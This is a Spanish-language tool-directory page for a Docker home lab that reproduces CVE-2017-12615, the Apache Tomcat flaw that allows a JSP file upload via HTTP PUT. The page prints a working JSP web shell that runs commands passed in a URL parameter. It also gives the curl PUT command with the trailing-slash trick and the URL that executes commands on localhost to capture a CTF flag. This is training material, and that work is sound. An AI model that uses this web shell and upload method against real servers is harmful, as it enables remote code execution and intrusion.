Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-12615-Home-Lab — CVE-2017-12615 Tomcat: Ejecución Remota de Código mediante Subida de JSP - Laboratorio en Casa para Equipo Rojo, Pruebas de Penetración | Kitploit
Herramientas/GitHubGitHub/netw0rk7/cve-2017-12615-home-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingLabs y Práctica
GitHub
netw0rk7/cve-2017-12615-home-lab

CVE-2017-12615-Home-Lab

CVE-2017-12615 Tomcat: Ejecución Remota de Código mediante Subida de JSP - Laboratorio en Casa para Equipo Rojo, Pruebas de Penetración

Ver Repositorio
7hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-12615 Tomcat: Ejecución Remota de Código mediante Subida de JSP

image

Este laboratorio simula la vulnerabilidad CVE-2017-12615 Tomcat: Ejecución Remota de Código mediante Subida de JSP
Se produce por la configuración readonly=false, que permite subir archivos mediante HTTP PUT, incluyendo archivos .jsp que pueden ejecutar comandos (RCE).


image

Características

  • Apache Tomcat 7.0.79 (vulnerable)
  • Sobrescritura de DefaultServlet con readonly=false
  • Permite usar PUT Upload para colocar archivos .jsp en el directorio web ROOT
  • Soporta ejecución de comandos a través de un web shell
  • Página web de estilo industrial con una nota interna olvidada (pista)
  • Sistema que genera flag_RANDOM.txt automáticamente cada vez que el contenedor se inicia
  • Diseñado para CTF / Red Team / Entrenamiento de Pentest

Estructura de Directorios

/opt/apache-tomcat-7.0.79/
/opt/apache-tomcat-7.0.79/webapps/ROOT/index.jsp
/opt/apache-tomcat-7.0.79/webapps/ROOT/WEB-INF/web.xml
/tmp/flag_RANDOM.txt
/docker-entrypoint.sh

Uso (Ejecutar el Contenedor)

docker compose build
docker compose up -d

Abrir el navegador:

http://localhost:8080/

Cómo Probar la Vulnerabilidad CVE-2017-12615

1) Crear un archivo JSP de payload

cat > shell.jsp << 'EOF'
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    String s;
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = r.readLine()) != null) out.println(s + "<br>");
}
%>
EOF

2) Subir el archivo con PUT (debe llevar / al final del nombre)

curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

3) Ejecutar el webshell

http://localhost:8080/shell.jsp?cmd=id

Flag

Se encuentra en:

/tmp/flag_RANDOM.txt

Versión en Inglés — CVE-2017-12615 Tomcat: Ejecución Remota de Código mediante Subida de JSP

Este laboratorio simula CVE-2017-12615 Tomcat: Ejecución Remota de Código mediante Subida de JSP, donde el DefaultServlet de Apache Tomcat está mal configurado con:

readonly=false

Esto permite a los atacantes subir archivos .jsp mediante HTTP PUT, posibilitando la ejecución remota de código.


image

Características

  • Apache Tomcat 7.0.79 vulnerable
  • Sobrescritura de DefaultServlet con readonly=false
  • PUT Upload → escribir archivos .jsp arbitrarios en el directorio web ROOT
  • Soporta ejecución de comandos a través de un shell JSP
  • Página de inicio de estilo industrial con una pista interna sutil
  • flag_RANDOM.txt generado automáticamente al iniciar el contenedor
  • Adecuado para CTF, investigación y desarrollo de exploits

Ejemplo de Explotación

Subir un shell JSP

curl -v -X PUT "http://localhost:8080/shell.jsp/"   -H "Content-Type: text/plain"   --data-binary @shell.jsp

Ejecutar comandos

http://localhost:8080/shell.jsp?cmd=id

Ubicación del Flag

/tmp/flag_RANDOM.txt

Aviso Legal

Solo para fines educativos, de investigación y pruebas de penetración autorizadas.

Descargar herramienta